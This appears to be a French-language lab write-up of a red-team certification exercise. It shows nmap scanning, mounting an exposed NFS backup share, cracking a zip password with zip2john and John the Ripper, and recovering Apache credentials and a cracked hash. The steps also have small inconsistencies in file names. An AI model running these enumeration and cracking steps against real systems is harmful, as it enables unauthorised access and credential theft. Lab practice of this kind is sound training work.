SUMMUS: Extreme Red Teamer Lab https://extremeredlab.0x29a.it/redteamlabs

![[20250825134143.png]]

Présentation du laboratoire

Notre laboratoire de certification est structuré pour tester les compétences pratiques et stratégiques requises pour fonctionner comme un véritable laboratoire Extreme Red Teamer.

Les candidats seront confrontés à des scénarios avancés qui incluent :

  • Linux et Windows : exploits et élévation des privilèges
  • Active Directory : attaques avancées et persistance
  • Pivotement extrême : mouvement latéral dans des réseaux complexes
  • Mise en réseau : manipuler les paquets dans les réseaux
  • Sécurité du cloud : vulnérabilités et erreurs de configuration dans GCP, AWS et Azure
  • Vulnérabilités du monde réel : exploiter les failles de sécurité

La réussite du laboratoire nécessite des compétences techniques avancées, une pensée critique et une adaptabilité.

Machine Kali Jump : 🔹 Serveur : 10.0.1.200 🔹 Utilisateur : red 🔹 Mot de passe : I’mthebest

je me suis connecte sur la machine

Machine 1 : 10.0.1.7

Enumeration

nmap

nmap -sV -p- 10.0.1.7 -vv
PORT      STATE SERVICE         REASON         VERSION
22/tcp    open  ssh             syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
111/tcp   open  rpcbind         syn-ack ttl 64 2-4 (RPC #100000)
540/tcp   open  uucp            syn-ack ttl 64 NetBSD uucpd
2049/tcp  open  nfs_acl         syn-ack ttl 64 3 (RPC #100227)
4444/tcp  open  krb524?         syn-ack ttl 64
4455/tcp  open  tcpwrapped      syn-ack ttl 64
8000/tcp  open  http            syn-ack ttl 64 SimpleHTTPServer 0.6 (Python 3.11.7)
8080/tcp  open  http            syn-ack ttl 64 SimpleHTTPServer 0.6 (Python 3.11.2)
30000/tcp open  ndmps?          syn-ack ttl 64
36267/tcp open  nlockmgr        syn-ack ttl 64 1-4 (RPC #100021)
40000/tcp open  ssl/safetynetp? syn-ack ttl 64
41137/tcp open  status          syn-ack ttl 64 1 (RPC #100024)
41991/tcp open  mountd          syn-ack ttl 64 1-3 (RPC #100005)
50115/tcp open  mountd          syn-ack ttl 64 1-3 (RPC #100005)
59971/tcp open  mountd          syn-ack ttl 64 1-3 (RPC #100005)

Comme indiqué ci-dessus, la cible exécute NFS, ce qui permet une énumération plus poussée.

Nous avons interroge le demon de moontage sur un hote distant obtenir des informations sur l’etat du serveur NFS de la machine

red@start:~$ showmount -e 10.0.1.7
Export list for 10.0.1.7:
/var/backup *

Comme indiqué ci-dessus dans la liste d’exportation reçue de la cible, un répertoire /var/backup * est disponible pour le montage.

red@start:/tmp$ mkdir  /tmp/mount
sudo mount -t nfs 10.0.1.7:/var/backup /tmp/mount
mount | grep /tmp/mount
mount | grep /tmp/mount

ls
etc.zip mfa.zip NOTES zi7zp9Uv

sudo zip2john mfa.zip > zip_hash.txt

john –wordlist=/home/kali/Documents/TryHackme/Wordlist/rockyou.txt zip_hashetc.txt

Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press ‘q’ or Ctrl-C to abort, almost any other key for status 05ultra (etc.zip)
1g 0:00:00:03 DONE (2025-11-29 17:52) 0.3039g/s 4250Kp/s 4250Kc/s 4250KC/s 0606299330727..0591DUB10 Use the “–show” option to display all of the cracked passwords reliably Session completed.

cat apache_credentials jump:extremeRTlabs:0b90b1df56afe6e06ed887c4f5f3528f

0b90b1df56afe6e06ed887c4f5f3528f : THERESE